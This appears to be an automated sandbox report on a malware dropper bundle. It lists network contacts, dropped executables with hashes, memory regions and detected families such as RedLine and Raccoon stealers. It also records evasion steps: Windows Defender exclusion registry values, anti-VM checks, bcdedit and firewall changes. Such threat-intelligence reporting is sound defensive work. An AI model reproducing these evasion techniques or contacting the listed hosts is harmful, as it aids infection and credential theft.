| US | 8.8.8.8:53 | gp.gamebuy768.com | udp |
| US | 8.8.8.8:53 | one-mature-tube.me | udp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | gp.gamebuy768.com | udp |
| US | 8.8.8.8:53 | one-mature-tube.me | udp |
| FI | 135.181.79.37:10902 | tcp | |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | one-mature-tube.me | udp |
| US | 8.8.8.8:53 | gp.gamebuy768.com | udp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | one-mature-tube.me | udp |
| US | 8.8.8.8:53 | gp.gamebuy768.com | udp |
| FI | 135.181.79.37:10902 | tcp | |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | gp.gamebuy768.com | udp |
| US | 8.8.8.8:53 | one-mature-tube.me | udp |
| DE | 49.13.236.103:443 | mstdn.social | tcp |
| DE | 178.63.82.37:443 | koyu.space | tcp |
| FI | 135.181.79.37:10902 | tcp | |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | gp.gamebuy768.com | udp |
| US | 8.8.8.8:53 | one-mature-tube.me | udp |
| RU | 185.215.113.44:23759 | tcp | |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | one-mature-tube.me | udp |
| US | 8.8.8.8:53 | gp.gamebuy768.com | udp |
| FI | 135.181.79.37:10902 | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
| MD5 | 2c3db571085a0f88cd336201868ede9c |
| SHA1 | 26f219c2369c8c4c8ad8e658fa907f73078e274c |
| SHA256 | c9a4ba85ca3416b83d174844eba1c0aeb8b55d316a68e8d6cf7a732b9c14c2fd |
| SHA512 | 34d874cd8e1b5567ba9585cdeec5cf80e35475f1f8880194f09cf2005d3f9153b76ffaa5cd6f830b99ef472b9db37546358118bf3dd0f92933662067876dd65d |
C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\setup_install.exe
| MD5 | f7154abf1245e17ee802340608c5f728 |
| SHA1 | 48fc1a71ad8dd0f04699b60144ed28e50ecd61dd |
| SHA256 | 6a1adfee6f5c76521479177391647ec0cdd3c367600a72904d87c4edb25f5344 |
| SHA512 | e5f79d338e0c2bbb65a799c389479ec955d7370c674e5aa13ecbae7d62be57f51f4f7b24e597e36078c901539a60923baf489483689781005e05dd76095b2192 |
C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\libcurl.dll
| MD5 | d09be1f47fd6b827c81a4812b4f7296f |
| SHA1 | 028ae3596c0790e6d7f9f2f3c8e9591527d267f7 |
| SHA256 | 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e |
| SHA512 | 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595 |
memory/1684-87-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/1684-93-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/1684-96-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/1684-95-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/1684-94-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/1684-92-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/1684-91-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/1684-90-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/1684-89-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/1684-88-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/1684-86-0x0000000064940000-0x0000000064959000-memory.dmp
memory/1684-85-0x0000000064941000-0x000000006494F000-memory.dmp
memory/1684-84-0x000000006B440000-0x000000006B4CF000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\libstdc++-6.dll
| MD5 | 5e279950775baae5fea04d2cc4526bcc |
| SHA1 | 8aef1e10031c3629512c43dd8b0b5d9060878453 |
| SHA256 | 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87 |
| SHA512 | 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02 |
C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\libwinpthread-1.dll
| MD5 | 1e0d62c34ff2e649ebc5c372065732ee |
| SHA1 | fcfaa36ba456159b26140a43e80fbd7e9d9af2de |
| SHA256 | 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723 |
| SHA512 | 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61 |
C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\libgcc_s_dw2-1.dll
| MD5 | 9aec524b616618b0d3d00b27b6f51da1 |
| SHA1 | 64264300801a353db324d11738ffed876550e1d3 |
| SHA256 | 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e |
| SHA512 | 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0 |
memory/1684-78-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/1684-82-0x00000000007A0000-0x000000000082F000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\libcurlpp.dll
| MD5 | e6e578373c2e416289a8da55f1dc5e8e |
| SHA1 | b601a229b66ec3d19c2369b36216c6f6eb1c063e |
| SHA256 | 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f |
| SHA512 | 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89 |
C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun15b94526a807b.exe
| MD5 | 204801e838e4a29f8270ab0ed7626555 |
| SHA1 | 6ff2c20dc096eefa8084c97c30d95299880862b0 |
| SHA256 | 13357a53f4c23bd8ac44790aa1db3233614c981ded62949559f63e841354276a |
| SHA512 | 008e6cb08094621bbcadfca32cc611a4a8c78158365e5c81eb58c4e7d5b7e3d36c88b543390120104f1c70c5393b1c1c38c33761cf65736fdf6873648df3fc8e |
C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun150e9a93676ff.exe
| MD5 | 53759f6f2d4f415a67f64fd445006dd0 |
| SHA1 | f8af2bb0056cb578711724dd435185103abf2469 |
| SHA256 | 7477156f6856ac506c7ca631978c2369e70c759eb65895dfce8ba4cfce608d58 |
| SHA512 | 6c7cb5d0fb8efc43425dca72711c017971536ed74a7c4fe3e9cc47e63b8fe1f586a762d3c7edcee193250b4693382233720cc7b88fc6ca0f8f14b8769a77a5d9 |
memory/1684-126-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/4312-130-0x0000000000DB0000-0x0000000000E49000-memory.dmp
memory/4312-131-0x0000000000DB0000-0x0000000000E49000-memory.dmp
memory/4332-148-0x0000000005550000-0x0000000005B78000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun15c4c762b69ba5.exe
| MD5 | 480f84b5495d22186ca365cfbfc51594 |
| SHA1 | eae7c5ed3b0f729360fdd3879f65367a3d14dd95 |
| SHA256 | ab63359f23420ce59260dddb7a1747ff97daf656de360a79e35531032ba26e3f |
| SHA512 | ef7df3d3427e621ecc4bbdba0df717ba7509d36896bccfab1a2c461f019c95728936a42a6261649e9a6b8f5037f42678bdbe51ea82af68b8e8f8a9765ee57482 |
C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun1524d92394d.exe
| MD5 | 7362b881ec23ae11d62f50ee2a4b3b4c |
| SHA1 | 2ae1c2a39a8f8315380f076ade80028613b15f3e |
| SHA256 | 8af8843d8d5492c165ef41a8636f86f104bf1c3108372a0933961810c9032cf2 |
| SHA512 | 071879a8901c4d0eba2fa886b0a8279f4b9a2e3fbc7434674a07a5a8f3d6a6b87a6dce414d70a12ab94e3050bd3b55e8bfaf8ffea6d24ef6403c70bd4a1c5b74 |
memory/3780-156-0x0000000000400000-0x00000000007FA000-memory.dmp
memory/4312-161-0x0000000003310000-0x0000000003322000-memory.dmp
memory/4916-167-0x00000000057D0000-0x0000000005862000-memory.dmp
memory/3780-173-0x0000000000400000-0x00000000007FA000-memory.dmp
memory/4312-172-0x00000000055D0000-0x000000000561C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-HFUCS.tmp\Sun15b94526a807b.tmp
| MD5 | a6865d7dffcc927d975be63b76147e20 |
| SHA1 | 28e7edab84163cc2d0c864820bef89bae6f56bf8 |
| SHA256 | fdfcbc8cfb57a3451a3d148e50794772d477ed6cc434acc779f1f0dd63e93f4b |
| SHA512 | a9d2b59b40793fb685911f0e452e43a8e83c1bd133fda8a2a210ef1b9ca7ad419b8502fbb75b37f1b0fdef6ad0381b7d910fbff0bcfdeeec9e26b81d11effcec |
memory/4312-170-0x0000000075FD0000-0x0000000076583000-memory.dmp
memory/4916-169-0x00000000058F0000-0x00000000058FC000-memory.dmp
memory/4312-168-0x0000000005590000-0x00000000055CC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-SFSN3.tmp\idp.dll
| MD5 | 55c310c0319260d798757557ab3bf636 |
| SHA1 | 0892eb7ed31d8bb20a56c6835990749011a2d8de |
| SHA256 | 54e7e0ad32a22b775131a6288f083ed3286a9a436941377fc20f85dd9ad983ed |
| SHA512 | e0082109737097658677d7963cbf28d412dca3fa8f5812c2567e53849336ce45ebae2c0430df74bfe16c0f3eebb46961bc1a10f32ca7947692a900162128ae57 |
memory/4332-195-0x0000000005D30000-0x0000000006084000-memory.dmp
memory/4332-190-0x0000000005CC0000-0x0000000005D26000-memory.dmp
memory/4332-189-0x0000000005C50000-0x0000000005CB6000-memory.dmp
memory/4332-188-0x0000000005BB0000-0x0000000005BD2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3xqg5mmc.uyl.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3780-176-0x0000000000400000-0x00000000007FA000-memory.dmp
memory/4616-166-0x0000000001180000-0x0000000001186000-memory.dmp
memory/4312-164-0x0000000005770000-0x000000000587A000-memory.dmp
memory/4616-163-0x00000000009C0000-0x00000000009DE000-memory.dmp
memory/4916-162-0x0000000000E10000-0x0000000000F44000-memory.dmp
memory/3648-158-0x0000000000400000-0x00000000004CC000-memory.dmp
memory/4312-160-0x0000000005C80000-0x0000000006298000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun157e7a96e632.exe
| MD5 | dcde74f81ad6361c53ebdc164879a25c |
| SHA1 | 640f7b475864bd266edba226e86672101bf6f5c9 |
| SHA256 | cc10c90381719811def4bc31ff3c8e32c483c0eeffcb149df0b071e5a60d517b |
| SHA512 | 821b1a05601bbaee21cbd0b3cf2859359795ae55a3df8dea81f1142ede74b52af31273ffbbba772d77e40477853e6b02c9df8c44fc2ddad1cf3d248530427fc0 |
memory/4520-153-0x0000000000400000-0x00000000004DE000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun156aa32cae4a.exe
| MD5 | 0fef60f3a25ff7257960568315547fc2 |
| SHA1 | 8143c78b9e2a5e08b8f609794b4c4015631fcb0b |
| SHA256 | c7105cfcf01280ad26bbaa6184675cbd41dac98690b0dcd6d7b46235a9902099 |
| SHA512 | d999088ec14b8f2e1aa3a2f63e57488a5fe3d3375370c68c5323a21c59a643633a5080b753e3d69dfafe748dbdfeb6d7fa94bdf5272b4a9501fd3918633ee1e5 |
memory/4472-151-0x0000000000400000-0x00000000004DE000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun15168f90478cc7.exe
| MD5 | 831ec888d8238e49c4371f643fdcaa9e |
| SHA1 | 5991867930cc585e201d50e7d76a7afada780f90 |
| SHA256 | 26ef4111e91e052367a9b8daed46b3684acf8ed665fe1b6bdf751995557fadb9 |
| SHA512 | d926bde2f13852fc084ec48e8baf00c36e06644f6d6a59918715752c5f092d7e258cca650d241f3d480713e8085aa1f17897fe9edea4764262c46be653de4609 |
memory/4312-147-0x0000000074AA0000-0x0000000074B29000-memory.dmp
memory/4312-146-0x0000000000DB0000-0x0000000000E49000-memory.dmp
memory/4312-145-0x0000000076D80000-0x0000000076E63000-memory.dmp
memory/2396-209-0x0000000000400000-0x00000000004CC000-memory.dmp
memory/4976-212-0x0000000000400000-0x0000000000682000-memory.dmp
memory/4312-140-0x0000000075D40000-0x0000000075FC1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun15a8461882.exe
| MD5 | 4bb6c620715fe25e76d4cca1e68bef89 |
| SHA1 | 0cf2a7aad7ad7a804ca2b7ccaea1a6aadd75fb80 |
| SHA256 | 0b668d0ac89d5da1526be831f7b8c3f2af54c5dbc68c0c9ce886183ec518c051 |
| SHA512 | 59203e7c93eda1698f25ee000c7be02d39eee5a0c3f615ae6b540c7a76e6d47265d4354fa38be5206810e6b035b8be1794ebe324c0e9db33360a4f0dd3910549 |
C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun154ca5fada.exe
| MD5 | aa75aa3f07c593b1cd7441f7d8723e14 |
| SHA1 | f8e9190ccb6b36474c63ed65a74629ad490f2620 |
| SHA256 | af890b72e50681eee069a7024c0649ac99f60e781cb267d4849dae4b310d59c1 |
| SHA512 | b1984c431939e92ea6918afbbc226691d1e46e48f11db906fec3b7e5c49075f33027a2c6a16ab4861c906faa6b50fddc44201922e44a0243f9883b701316ca2b |
C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun1585e1028b0.exe
| MD5 | fb8851a1a68d306eb1623bad276012c3 |
| SHA1 | 33c2e2a59351591807853e58c24edb925e56a216 |
| SHA256 | d222076f428d9d190f72e7d6b0373083f2659804fdb2265603aa66efd640ff7e |
| SHA512 | 3ad2114d8ebde46e981f7ef261ace24a5a47674987047199d22eeeca82c3dd05aeed9a01ff1e6df11a180c051063c9d55cab09e923e8229e0d08e62b46d99b6a |
C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun15e81af69f990d3a6.exe
| MD5 | 4c35bc57b828bf39daef6918bb5e2249 |
| SHA1 | a838099c13778642ab1ff8ed8051ff4a5e07acae |
| SHA256 | bfc863ff5634087b983d29c2e0429240dffef2a379f0072802e01e69483027d3 |
| SHA512 | 946e23a8d78ba0cfe7511e9f1a443ebe97a806e5614eb6f6e94602eeb04eb03ea87446e0b2c57e6102dad8ef09a7b46c10841aeebbffe4be81aad236608a2f3b |
memory/4312-137-0x0000000075410000-0x0000000075625000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun15635943177.exe
| MD5 | b0e64f3da02fe0bac5102fe4c0f65c32 |
| SHA1 | eaf3e3cb39714a9fae0f1024f81a401aaf412436 |
| SHA256 | dbc10a499e0c3bddcfa7266d5cce117343e0d8a164bdaa5d5dbcfee5d5392571 |
| SHA512 | 579d4ba54a5a41cf2261360f0c009fd3e7b6990499e2366cb6f1eceacb2cc6215f053e780484908211b824711acbea389f3d91de6f40b9e2b6564baedd106805 |
C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun15591a43f8a.exe
| MD5 | c18fd5cf734e7438fb340750cd11c605 |
| SHA1 | 7a199f1836fdf27932cee19f83c7421ed05e9108 |
| SHA256 | 36a0dfbe4e1491c2d4b84e06fd4cf17d24e8a770f32618d6951f93db14158bc7 |
| SHA512 | d56380274c2d7e2b220dc994600c3edfc1a3511440418fbbc98d718368138d8f388fe337256b9d57b01ca5aad4a5d92d07c1d87ed8a9d03b1d1289b9cfcb27a0 |
memory/3956-136-0x0000000002170000-0x00000000021A6000-memory.dmp
memory/4312-135-0x0000000000F40000-0x0000000000F85000-memory.dmp
memory/4312-134-0x00000000010A0000-0x00000000010A1000-memory.dmp
memory/3524-133-0x00000000003C0000-0x00000000003C8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun1580e9cd8c23e.exe
| MD5 | 88c2669e0bd058696300a9e233961b93 |
| SHA1 | fdbdc7399faa62ef2d811053a5053cd5d543a24b |
| SHA256 | 4e3c72337ad6ede0f71934734ba639a39949c003d7943cb946ea4173b23fd0b7 |
| SHA512 | e159767dbf9ce9cce58ee9ee8f2edeffdc9edcf56253ccd880b5f55014c56e267fdb8fdeb8e18c1bd2285e4a31938053c488ee52722d540352d6093dbe974e9c |
C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun1515dbfc0edab0.exe
| MD5 | 9c41934cf62aa9c4f27930d13f6f9a0c |
| SHA1 | d8e5284e5cb482abaafaef1b5e522f38294001d2 |
| SHA256 | c55a03ca5ef870fd4b4fdf8595892155090f796578f5dd457030094b333d26b0 |
| SHA512 | d2c4d6af13557be60cf4df941f3184a5cce9305c1ca7a66c5a998073dbe2e3462a4afce992432075a875ca09297bb5559ccd7bca3e1fe2c59760a675192f49d5 |
C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun15372e8db79ed3d.exe
| MD5 | e52d81731d7cd80092fc66e8b1961107 |
| SHA1 | a7d04ed11c55b959a6faaaa7683268bc509257b2 |
| SHA256 | 4b6212f2dbf8eb176019a4748ce864dd04753af4f46c3d6d89d392a5fb007e70 |
| SHA512 | 69046e90e402156f358efa3baf74337eacd375a767828985ebe94e1b886d5b881e3896d2200c9c9b90abab284d75466bc649b81c9f9e89f040b0db5d301d1977 |
C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun156d9ca8467.exe
| MD5 | 31f859eb06a677bbd744fc0cc7e75dc5 |
| SHA1 | 273c59023bd4c58a9bc20f2d172a87f1a70b78a5 |
| SHA256 | 671539883e1cd86422b94e84cc21f3d9737c8327b7a76c4972768248cb26b7e6 |
| SHA512 | 7d6a611bc76132a170a32fcbe4c3e3b528a90390b612ce2171febea59f1b723dafc0ec9628df50d07a9841561ddb23cdefbf3adcac160da60e337e7f3695e4ec |
memory/1684-125-0x0000000064940000-0x0000000064959000-memory.dmp
memory/1684-124-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/1684-123-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/1684-120-0x000000006EB40000-0x000000006EB63000-memory.dmp
memory/1684-117-0x0000000000400000-0x000000000051D000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun15132bf2c585337a0.exe
| MD5 | 1f9b3bc156f958523739194cd2733887 |
| SHA1 | 524816ed7d4616af3137cf6dd48310441efdea3b |
| SHA256 | 3e2b6469551fac2d98c0efb1668096a4b247d30a1a0f40b1b2b16c3a78218abd |
| SHA512 | 296ce4dffa32bff8b04ad542e55832695c2643426def71aa8b4fc9973691eafb84bbc645abbde3ee96fb8b25322152e9ab68b550bf2f220ec8a38fba5747a16c |
C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun1500b8e65c1f53.exe
| MD5 | 23a1ebcc1aa065546e0628bed9c6b621 |
| SHA1 | d8e8a400990af811810f5a7aea23f27e3b099aad |
| SHA256 | 9615e9c718ebdfae25e1424363210f252003cf2bc41bffdd620647fc63cd817a |
| SHA512 | 8942ce8c005f423d290220f7cc53ee112654428793287c0e330ee3318630845a86afcd9802fe56e540051f8224a71ddf9e4af59ea418469005ba0fbd770989a3 |
C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun1507dd11d509.exe
| MD5 | 43e459f57576305386c2a225bfc0c207 |
| SHA1 | 13511d3f0d41fe28981961f87c3c29dc1aa46a70 |
| SHA256 | fb58f709914380bce2e643aa0f64cd5458cb8b29c8f072cd1645e42947f89787 |
| SHA512 | 33cbcc6fb73147b7b3f2007be904faf01dc04b0e773bb1cfe6290f141b1f01cb260cd4f3826e30ab8c60d981bcc1b7f60e17ab7146ba32c94c87ac3a2b717207 |
memory/3648-214-0x0000000000400000-0x00000000004CC000-memory.dmp
memory/4472-225-0x0000000000400000-0x00000000004DE000-memory.dmp
memory/4520-226-0x0000000000400000-0x00000000004DE000-memory.dmp
memory/4332-227-0x0000000006310000-0x000000000632E000-memory.dmp
memory/2948-231-0x0000000000400000-0x0000000000455000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\11111.exe
| MD5 | cc0d6b6813f92dbf5be3ecacf44d662a |
| SHA1 | b968c57a14ddada4128356f6e39fb66c6d864d3f |
| SHA256 | 0c2ade2993927f6de828e30c07156c19751b55650a05c965631ca0ea1c983498 |
| SHA512 | 4d4275338cd8a089c25757440b876654b569d39bfd970109cceb09c29ca79c8f3b1fdfcc6316ef18a9eb68cddf0c2d6daa0fa27fafc1f27b8103b4aa1db1fbc5 |
memory/4312-252-0x0000000075D40000-0x0000000075FC1000-memory.dmp
memory/4312-257-0x0000000073A60000-0x0000000073A68000-memory.dmp
memory/4312-256-0x0000000075060000-0x000000007506F000-memory.dmp
memory/4312-255-0x0000000073B40000-0x0000000073BCD000-memory.dmp
memory/4312-254-0x00000000756C0000-0x0000000075705000-memory.dmp
memory/4312-253-0x0000000076CE0000-0x0000000076D76000-memory.dmp
memory/4312-249-0x0000000077110000-0x00000000771CF000-memory.dmp
memory/4312-245-0x00000000751A0000-0x00000000752C0000-memory.dmp
memory/4312-248-0x0000000075340000-0x00000000753FF000-memory.dmp
memory/4312-244-0x0000000077000000-0x000000007707B000-memory.dmp
memory/4312-242-0x0000000075410000-0x0000000075625000-memory.dmp
memory/4312-241-0x0000000000DB0000-0x0000000000E49000-memory.dmp
memory/4312-251-0x0000000073BF0000-0x0000000073C42000-memory.dmp
memory/4312-243-0x0000000075A10000-0x0000000075A34000-memory.dmp
memory/4312-260-0x0000000072D90000-0x0000000072E3B000-memory.dmp
memory/4312-266-0x0000000000DB0000-0x0000000000E49000-memory.dmp
memory/4312-265-0x0000000069970000-0x0000000069A75000-memory.dmp
memory/4312-264-0x0000000075A40000-0x0000000075AA3000-memory.dmp
memory/4312-263-0x0000000076FE0000-0x0000000076FF9000-memory.dmp
memory/4312-262-0x0000000074AA0000-0x0000000074B29000-memory.dmp
memory/4312-259-0x0000000072E40000-0x0000000072E54000-memory.dmp
memory/4312-258-0x00000000732B0000-0x0000000073A60000-memory.dmp
memory/3956-293-0x0000000006A50000-0x0000000006AF3000-memory.dmp
memory/4332-288-0x00000000072D0000-0x00000000072EE000-memory.dmp
memory/3956-274-0x000000006C830000-0x000000006C87C000-memory.dmp
memory/4332-272-0x000000006C830000-0x000000006C87C000-memory.dmp
memory/3416-296-0x0000000000400000-0x0000000000C36000-memory.dmp
memory/4592-297-0x0000000000400000-0x000000000081F000-memory.dmp
memory/3956-303-0x0000000006E40000-0x0000000006E4A000-memory.dmp
memory/3572-299-0x0000000000400000-0x000000000053D000-memory.dmp
memory/3956-295-0x0000000006DC0000-0x0000000006DDA000-memory.dmp
memory/3956-304-0x0000000007050000-0x00000000070E6000-memory.dmp
memory/3956-294-0x0000000007400000-0x0000000007A7A000-memory.dmp
memory/4332-271-0x0000000007290000-0x00000000072C2000-memory.dmp
memory/3956-305-0x0000000006FE0000-0x0000000006FF1000-memory.dmp
memory/3956-307-0x0000000007010000-0x000000000701E000-memory.dmp
memory/3956-308-0x0000000007020000-0x0000000007034000-memory.dmp
memory/3956-325-0x0000000007110000-0x000000000712A000-memory.dmp
memory/3956-326-0x0000000007100000-0x0000000007108000-memory.dmp
memory/2396-337-0x0000000000400000-0x00000000004CC000-memory.dmp
memory/2276-339-0x0000000002100000-0x00000000022A5000-memory.dmp
memory/3960-340-0x0000000000400000-0x0000000000682000-memory.dmp
memory/1708-341-0x0000000002FE0000-0x000000000308E000-memory.dmp
memory/1708-342-0x0000000003090000-0x000000000312A000-memory.dmp
memory/4916-415-0x0000000005E60000-0x0000000005EFC000-memory.dmp
memory/4916-416-0x0000000005F00000-0x0000000005FE8000-memory.dmp
memory/4916-417-0x0000000006590000-0x0000000006B34000-memory.dmp
memory/1088-450-0x0000000005AB0000-0x0000000005E04000-memory.dmp
memory/1088-492-0x000000006C830000-0x000000006C87C000-memory.dmp
memory/1088-502-0x0000000007340000-0x00000000073E3000-memory.dmp
memory/1088-508-0x0000000005F60000-0x0000000005F71000-memory.dmp
memory/1088-510-0x0000000005FA0000-0x0000000005FB4000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-11-08 10:35
Reported
2024-11-08 10:38
Platform
win7-20240903-en
Max time kernel
79s
Max time network
147s
Command Line
Signatures
Detect Fabookie payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Fabookie
Fabookie family
Glupteba
Glupteba family
NullMixer
Nullmixer family
PrivateLoader
Privateloader family
Raccoon
Raccoon Stealer V1 payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Raccoon family
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Redline family
Socelars
Socelars family
Socelars payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Windows security bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\Sun1585e1028b0.exe = "0" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
Detected Nirsoft tools
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun156aa32cae4a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1500b8e65c1f53.exe | N/A |
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
NirSoft WebBrowserPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
